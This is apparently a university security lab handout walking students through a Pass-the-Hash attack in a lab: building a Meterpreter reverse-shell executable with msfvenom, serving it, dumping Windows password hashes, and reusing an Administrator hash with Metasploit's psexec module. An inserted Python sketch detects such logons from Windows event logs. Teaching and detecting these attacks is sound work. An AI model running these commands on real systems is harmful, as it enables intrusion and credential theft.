Proj 14x: Pass The Hash (10 pts. extra credit)

What You Need for this Project


To practice the Pass the Hash attack in a non-domain environment.

Task 1: Getting Hashes

Exploiting the Target with a Malicious Download

First we'll get the password hashes from the target, using malware. Launch your Kali machine.

In Kali, execute these commands to create a malicious Windows executable file named "mal.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4445 -f exe > /var/www/html/mal.exe
service apache2 start

In Kali, execute these commands to start a C&C listener.

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445

On your Windows target, in Firefox, go to this URL, replacing the IP address with the IP address of your Kali machine:

Download mal.exe and run it.

On your Kali machine, a Meterpreter session opens, as shown below.

Execute these commands to start interacting with the Meterpreter shell and dump the hashes:

sessions -i 1

Notice the highlighted text in the image above. This is the Administrator password hash, which we will use later.

Execute this command to close the Meterpreter session.


Task 2: Passing the Hash

Suppose you are attacking a company and you trick one user into running malware, so you get some hashes from that machine.

The hashes might work on other machines at the same company. In our case we'll attack the same target, but in a real pentest you'd be attacking a different machine.

Using Metasploit's Psexec Module

On Kali, in Metasploit, execute these commands:

use windows/smb/psexec
show options

As shown below, there are options for a username and password.

The amazing thing about the pass-the-hash attack is that the password hashes work fine without cracking them.

In Metasploit, execute these commands, replacing the IP address with the IP address of your target system:

set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

A Meterpreter session opens, as shown below.
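
From the defender's side, the logon in Task 2 is a network (type 3) NTLM logon by a local account from another machine, and PsExec-style execution then installs a service on the target. The following detection sketch is an added example, not part of the original project; it pairs Windows event 4624 (successful logon) with event 7045 (service installed). The event dictionaries, the "host" key, the host name, addresses, service name and the 60-second window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the original page), shaped like fields
# exported from the Windows Security (4624) and System (7045) logs.
EVENTS = [
    {"time": "2017-09-22T10:00:05", "host": "WIN-TARGET", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "Administrator",
     "TargetDomainName": "WIN-TARGET", "IpAddress": "192.0.2.50"},
    {"time": "2017-09-22T10:00:07", "host": "WIN-TARGET", "id": 7045,
     "ServiceName": "qXcVbNmK", "ImagePath": "%SYSTEMROOT%\\AbCdEfGh.exe"},
    {"time": "2017-09-22T11:30:00", "host": "WIN-TARGET", "id": 4624, "LogonType": 2,
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "Administrator",
     "TargetDomainName": "WIN-TARGET", "IpAddress": "-"},
    {"time": "2017-09-22T12:00:00", "host": "WIN-TARGET", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "student",
     "TargetDomainName": "WIN-TARGET", "IpAddress": "192.0.2.77"},
]

LOCAL_SOURCES = {"-", "", "127.0.0.1", "::1"}  # logons that did not cross the network

def is_remote_local_ntlm_logon(ev):
    """Network (type 3) NTLM logon by a local account from another machine."""
    return (ev["id"] == 4624 and ev["LogonType"] == 3
            and ev["AuthenticationPackageName"].upper() == "NTLM"
            # Local account: the logon domain is the machine's own name.
            and ev["TargetDomainName"].upper() == ev["host"].upper()
            and ev["IpAddress"] not in LOCAL_SOURCES)

def find_suspect_logons(events, window_seconds=60):
    """Pair each such logon with a service install on the same host soon after."""
    events = sorted(events, key=lambda e: e["time"])
    alerts = []
    for logon in filter(is_remote_local_ntlm_logon, events):
        start = datetime.fromisoformat(logon["time"])
        end = start + timedelta(seconds=window_seconds)
        services = [e["ServiceName"] for e in events
                    if e["id"] == 7045 and e["host"] == logon["host"]
                    and start <= datetime.fromisoformat(e["time"]) <= end]
        alerts.append({"host": logon["host"], "user": logon["TargetUserName"],
                       "source": logon["IpAddress"], "services": services,
                       "severity": "high" if services else "review"})
    return alerts

if __name__ == "__main__":
    for alert in find_suspect_logons(EVENTS):
        print(alert)
```

A remote NTLM logon by a local account with no service install is only marked "review", because ordinary file-share access by a local account looks the same in event 4624.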

Saving the Screen Image

Make sure you can see these two required items, as shown above:

Save a FULL DESKTOP image with the filename Proj 14x from Your Name.

Turning in Your Project

Send the image as an email attachment to with a Subject line of Proj 14x from Your Name.


Pass-the-hash attacks: Tools and Mitigation (2010)

Posted 9-22-17 by Sam Bowne
Revised 9-25-17